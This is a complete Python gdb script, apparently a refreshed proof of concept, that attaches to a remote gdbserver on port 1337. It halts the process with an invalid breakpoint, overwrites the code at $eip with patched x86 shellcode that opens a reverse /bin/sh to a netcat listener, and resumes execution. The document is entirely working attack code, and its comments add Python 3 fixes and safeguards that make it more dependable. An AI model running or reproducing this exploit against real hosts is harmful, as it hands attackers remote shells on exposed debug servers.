import binascii
import socket
import struct
import sys

import gdb
# (host, port) of the gdbserver instance to attach to. With an empty host the
# script issues "target extended-remote :1337", which gdb resolves to the
# local machine.
gdbserver = ('', 1337)
# (host, port) of the netcat listener the payload connects back to. The host
# must be replaced by the listener's IPv4 address as seen from the target:
# reverse_shell() passes it to socket.inet_aton, which rejects the empty
# default.
netcat = ('', 31338)
def progress(fmt, *args):
    """Write one status line to stdout and flush gdb's stdout stream.

    ``fmt`` is a %-style format string and ``args`` are its values. A
    newline is appended, and gdb's own stdout buffer is flushed so the line
    is not held back while gdb.execute calls are running.
    """
    line = fmt % args
    sys.stdout.write(line + '\n')
    gdb.flush(gdb.STDOUT)
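def reverse_shell(target):
    """Return a 32-bit x86 Linux connect-back ``/bin/sh`` payload as bytes.

    Modified from http://www.exploit-db.com/exploits/25497/ : the template
    pushes a placeholder port (0xffff) and a placeholder IPv4 address
    (0x00000000) for the sockaddr_in, and this function patches them in.

    The original signature used tuple-parameter unpacking and
    ``str.decode('hex')``, both Python 2 only; gdb's embedded Python is
    3.x in current builds, where the old code fails to even parse. This
    version runs on both, and callers still pass one ``(ip, port)`` tuple.

    Args:
        target: ``(ip, port)``; ``ip`` a dotted-quad IPv4 string, ``port``
            an int in 0..65535.

    Returns:
        ``bytes`` (``str`` on Python 2) of the patched payload, 94 bytes.

    Raises:
        socket.error / OSError: ``ip`` is not a valid dotted quad (the
            empty default in ``netcat`` is rejected here).
        struct.error: ``port`` does not fit in an unsigned 16-bit field.
    """
    ip, port = target
    ip_bytes = socket.inet_aton(ip)
    port_bytes = struct.pack('>H', port)  # network byte order, as sockaddr_in expects
    template = binascii.unhexlify(
        '31c031db31c931d2b066b301516a066a016a0289e1cd8089c6b06631dbb30268'
        '000000006668ffff6653fec389e16a10515689e156cd805b31c9b103fec9b03f'
        'cd8075f831c052686e2f7368682f2f626989e3525389e15289e2b00bcd80')
    # Each placeholder occurs exactly once in the template, so only the first
    # match is patched. The port goes in before the address: an address such
    # as 255.255.x.x contains 0xffff and would otherwise be mistaken for the
    # port placeholder.
    payload = template.replace(b'\xff\xff', port_bytes, 1)
    payload = payload.replace(b'\x00\x00\x00\x00', ip_bytes, 1)
    return payload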
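def main():
    """Attach to the gdbserver, stop the inferior, overwrite the code at
    ``$eip`` with the connect-back payload and resume it.

    Everything goes through ``gdb.execute``, so this only runs inside a gdb
    process (``gdb -x gdbservrce.py``). The unconditional ``main()`` call at
    the bottom keeps the original run-on-load behaviour of the script.
    Both the payload and the ``$eip`` register name are 32-bit x86 specific.
    """
    # Build the payload before touching gdb: socket.inet_aton rejects the
    # empty host that ``netcat`` defaults to, and in the original the error
    # only surfaced after the inferior had already been started.
    if not netcat[0]:
        raise ValueError('[!] set the netcat host to the IPv4 address the '
                         'target should connect back to')
    payload = reverse_shell(netcat)

    gdb.execute('set confirm off')
    gdb.execute('set verbose off')
    progress('[x] Connecting to %s:%d', gdbserver[0], gdbserver[1])
    gdb.execute('target extended-remote %s:%d' % gdbserver)

    # A breakpoint at address 0 can never be inserted; the original PoC
    # swallowed the resulting gdb.error from 'run', presumably because that
    # failure is what leaves the inferior stopped with its registers
    # writable. The error is now shown so that an unrelated failure (wrong
    # host, refused connection) is not hidden behind the same silence.
    progress('[x] Installing invalid breakpoint')
    bp = gdb.Breakpoint('*0', internal=True)
    progress('[x] Running..')
    try:
        gdb.execute('run')
    except gdb.error as err:
        progress('[x] run stopped: %s', err)
    progress('[x] Deleting invalid breakpoint')
    bp.delete()

    # Poke the payload over the code at $eip one byte per gdb command; gdb
    # writes the values verbatim, so NUL bytes in the payload are fine.
    # bytearray() yields ints on Python 2 (str payload) and 3 (bytes).
    progress('[x] Writing %d payload bytes at $eip', len(payload))
    for offset, value in enumerate(bytearray(payload)):
        gdb.execute('set *(unsigned char *)($eip + %d) = %d' % (offset, value))
    # Two continues, exactly as in the original PoC.
    gdb.execute('continue')
    gdb.execute('continue')


main()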